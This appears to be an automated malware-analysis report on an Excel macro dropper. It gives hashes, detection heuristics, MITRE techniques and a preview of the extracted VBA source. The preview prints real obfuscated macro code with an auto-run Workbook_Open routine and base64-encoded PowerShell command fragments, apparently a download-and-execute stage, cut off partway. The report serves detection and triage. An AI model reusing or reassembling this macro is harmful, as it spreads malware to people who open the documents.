Xls.Dropper.Agent-7568608-0 — Office (OOXML) malware analysis

Static analysis result for SHA-256 d79a0c97259f7d38…

MALICIOUS

Office (OOXML)

21.8 KB Created: 2020-01-23 00:14:40 UTC Authoring application: Microsoft Excel 15.0300 First seen: 2020-04-06
MD5: 82e08fe1ab703eaa53dbd87ce1c33df5 SHA-1: 7c6701c505e26335c274f5983cc1d6cbf370cfdb SHA-256: d79a0c97259f7d38597c972fe64d59902d271110ad55421f06657edfa661b8cd
262 Risk Score

Malware Insights

Xls.Dropper.Agent-7568608-0 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is an Excel document containing a Workbook_Open VBA macro, which is a common technique for executing malicious code upon opening. The VBA code is heavily obfuscated, but the presence of CreateObject calls and the ClamAV detection signature 'Xls.Dropper.Agent-7568608-0' strongly suggest it functions as a dropper for a second-stage payload. The macro's intent is to download and execute this payload, making it a high-confidence malicious artifact.

Heuristics 6

  • ClamAV: Xls.Dropper.Agent-7568608-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Agent-7568608-0
  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 10509 bytes
SHA-256: ff286812fc1b64206eb9dd2427096c010627a3e89ab45088748494acf2560882
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub workbook_open()
Wvzm4OKUMDYrrYbsqU.wAMH_HSAah5wetwsB9GU
nNNwAWLg3wBNt_z82Z48dpfOo3waGE1T_uMgvYFk5vGnfpBe3y1jDHz = "q8GGjtXv6pH9vQJaSRCrh1s91QhQNOO54OyxQ9AIVTryf"
CrkmXPt_GXzMGOQKEgoZM_faVISQ3TLH4axi6ny8dyuz9iHrr7OwBWR = "JHOM7bKvKpSoarOaqq5WRpaw_ji5_YEeHz"
WvWkABm8nRNbP9qx_Ta4ndqbLV3Oquj = "xekTbDEp3tSBHggSiMPSuCNJ2_4WmHVP2rZ6nnMs9nhISbh4oBRB"

ZaxtPYaVHrBtWCHZFjn49fTEdD1Xf_qkySyY3ooML1jPkwuPRF = "v_VXB3ErOKhBzHAZ5CLsfa5ZpG6DcpRiEXLkMZQ"
SJXboI_ZOJ2rDijTI6q37BMh386Z5XKduPXUBatfFdxRxie = "ex2ZPrW8P6zhpMhez8W6wIMQqKJubM4sRaYlB85u"
WQGXK3CQh87SZmrTjjr_gkeCBENMw6 = "b2CkhdBx_xG2LcOjRosDBaNzMuvDVEnxcke_PxD"
End Sub


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Wvzm4OKUMDYrrYbsqU"
Sub wAMH_HSAah5wetwsB9GU()
On Error GoTo -1
MUwKLBUuGqfxlxsLwcQ4rLvXdmVEDjD_pKbmxm6vfc = "wdu2zP25bBVEMAiWphoNqfmaFZU_WHgdWMXPmkw_MHGAqj8aDZ6VFPu"
IBkUaRzKhGXELKWKiAy6x4Sh2aLr1Ne__uoDelTawzmwQAQQKn89kgmOqBb_EGSRlWEZfRo6oWG8OfOzI5fLOeXaGXVbHTToeSJ45zt28
P1RuX5wfRd2r9kQs_uiAgXksfb4_7K = "IWEbGYSzWIZkyey29yvp1kgNL2OiM6AviETckfc1YMVY"
End Sub
Sub IBkUaRzKhGXELKWKiAy6x4Sh2aLr1Ne__uoDelTawzmwQAQQKn89kgmOqBb_EGSRlWEZfRo6oWG8OfOzI5fLOeXaGXVbHTToeSJ45zt28()
WuP5S_StqcbDZPfTSftmOvClGR797m_QRxX6penD9m3cqNBS8Z6XjNQjqmw_GSwDXItk2imx1onl2h52Ol_fqoqDewMBqm6nzx_fcZaWvFf4joqGr4tdROVrbp_DUk = 0
j6h_3mcDMPTgz1NOItkZHmBrJUPaU4PlMFnPRIpib6hQuv = "msQLqol5P64z4gVArR_qRrL779CA8K_s7WqfIGKk_RzqVbOGL"
mFw8H = mFw8H & "QwBNAEQAIAAgACAAIAAmACAAIAAgAC8AQwAgACAAIAAgAFAAbwBXAEUAcgBTAGgAZQBMAEwAIAAtAGUAIABaAGcAQgAxAEEARwA0AEEAWQB3AEIAMABBAEcAawBBAGIAdwBCAHUAQQBDAEEAQQBhAGcAQgBmAEEARQBrAEEAVwBRAEIAbQBBAEYARQBBAE4AQQBCAG4AQQBFAFEAQQBNAFEAQgBxAEEARQBZAEEAWgB3AEEAMwBBAEgAbwBBAGUAUQBBAGcAQQBDAGcAQQBJAEEAQQBrAEEARgBjAEEAZQBBAEIAWQBBAEUAWQBBAFkAUQBCAEIAQQBFAHMAQQBXAEEAQgBQAEEARwBzAEEATgBBAEIATQBBAEUAYwBBAGIAdwBCAGYAQQBDAEEAQQBMAEEAQQBnAEEAQwBRAEEAZABBAEIAagBBAEcAMABBAGMAUQBCAHQAQQBHAEkAQQBTAEEAQgAwAEEARABrAEEAVgB3AEIAegBBAEcAbwBBAGMAZwBCAHYAQQBHAGMAQQBUAGcAQgBpAEEARgBNAEEAVABnAEIAQwBBAEYAOABBAGIAUQBBAHkAQQBIAEkAQQBhAFEAQQBnAEEAQwBrAEEARABRAEEASwBBAEgAcwBBAEQAUQBBAEsAQQBBADAAQQBDAGcAQQBOAEEAQQBvAEEASwBBAEIATwBBAEcAVQBBAGQAdwBBAHQAQQBFADgAQQBZAGcAQgBxAEEARwBVAEEAWQB3AEIAMABBAEMAQQBBAFUAdwBCADUAQQBIA"
aLNPCb4fSOrkj7D1I2eyzziFXq_1djdr5xe9ya = "w9z2c9YUvyKitRUjlG2UbBBsu_puZDBq8jB1_"
mFw8H = mFw8H & "E0AQQBkAEEAQgBsAEEARwAwAEEATABnAEIATwBBAEcAVQBBAGQAQQBBAHUAQQBGAGMAQQBaAFEAQgBpAEEARQBNAEEAYgBBAEIAcABBAEcAVQBBAGIAZwBCADAAQQBDAGsAQQBMAGcAQgBFAEEARwA4AEEAZAB3AEIAdQBBAEcAdwBBAGIAdwBCAGgAQQBHAFEAQQBSAGcAQgBwAEEARwB3AEEAWgBRAEEAbwBBAEEAMABBAEMAZwBBAGsAQQBGAGMAQQBlAEEAQgBZAEEARQBZAEEAWQBRAEIAQgBBAEUAcwBBAFcAQQBCAFAAQQBHAHMAQQBOAEEAQgBNAEEARQBjAEEAYgB3AEIAZgBBAEMAQQBBAEwAQQBBAGcAQQBDAFEAQQBkAEEAQgBqAEEARwAwAEEAYwBRAEIAdABBAEcASQBBAFMAQQBCADAAQQBEAGsAQQBWAHcAQgB6AEEARwBvAEEAYwBnAEIAdgBBAEcAYwBBAFQAZwBCAGkAQQBGAE0AQQBUAGcAQgBDAEEARgA4AEEAYgBRAEEAeQBBAEgASQBBAGEAUQBBAGcAQQBBADAAQQBDAGcAQQBwAEEAQQAwAEEAQwBnAEEANwBBAEEAMABBAEMAZwBBAE4AQQBBAG8AQQBLAEEAQgBPAEEARwBVAEEAZAB3AEEAdABBAEUAOABBAFkAZwBCAHEAQQBHAFUAQQBZAHcAQgAwAEEAQwBBAEEATABRAEIAagBBAEcAOABBAGIAUQBBAGcAQQBGAE0AQQBhAEEAQg"
qlXPn_nW48kb4Upigat6FEcRm4qwdkHOcj5dcDx7VTzBDRerTFYHQ4 = "kH_msVz3RxT8SZJEcmviuNaNSX9bVK_8i"
mFw8H = mFw8H & "BsAEEARwB3AEEAYgBBAEEAdQBBAEUARQBBAGMAQQBCAHcAQQBHAHcAQQBhAFEAQgBqAEEARwBFAEEAZABBAEIAcABBAEcAOABBAGIAZwBBAHAAQQBDADQAQQBVAHcAQgBvAEEARwBVAEEAYgBBAEIAcwBBAEUAVQBBAGUAQQBCAGwAQQBHAE0AQQBkAFEAQgAwAEEARwBVAEEASwBBAEEAZwBBAEMAUQBBAGQAQQBCAGoAQQBHADAAQQBjAFEAQgB0AEEARwBJAEEAUwBBAEIAMABBAEQAawBBAFYAdwBCAHoAQQBHAG8AQQBjAGc
... (truncated)
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 29696 bytes
SHA-256: d27a2aeb4cffe4bb090e8bb9de912b3cc70da02a843e9d8145ed52b51a5e3b22
Detection
ClamAV: Xls.Dropper.Agent-7568608-0
Obfuscation or payload: likely
Carved artifact contains 4 long base64-like blob(s).